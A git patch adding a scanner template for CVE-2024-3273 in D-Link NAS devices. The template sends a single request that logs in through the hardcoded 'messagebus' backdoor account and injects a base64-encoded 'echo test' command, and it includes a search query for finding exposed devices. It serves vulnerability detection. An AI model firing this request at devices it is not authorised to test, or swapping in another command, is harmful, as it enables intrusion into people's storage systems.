From 224c2f1cf5e63425c607b3165293bd889df4a9d5 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Tue, 9 Apr 2024 22:45:08 +0530
Subject: [PATCH] Create CVE-2024-3273.yaml

---
 http/cves/2024/CVE-2024-3273.yaml | 29 +++++++++++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-3273.yaml

diff --git a/http/cves/2024/CVE-2024-3273.yaml b/http/cves/2024/CVE-2024-3273.yaml
new file mode 100644
index 0000000000..61bff3fcd6
--- /dev/null
+++ b/http/cves/2024/CVE-2024-3273.yaml
@@ -0,0 +1,29 @@
+id: CVE-2024-3273
+info:
+  name: D-Link Network Attached Storage - Command Injection and Backdoor Account
+  author: pussycat0x
+  severity: high
+  reference:
+    - https://github.com/netsecfish/dlink
+    - https://www.bleepingcomputer.com/news/security/over-92-000-exposed-d-link-nas-devices-have-a-backdoor-account/#google_vignette
+  metadata:
+    verified: true
+    fofa-query: app="D_Link-DNS-ShareCenter"
+  tags: cve,cve2024,dlink,nas  
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=ZWNobyB0ZXN0"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<auth_state>1</auth_state>"
+          - "test"
+        condition: and
+
+      - type: status
+        status:
+          - 200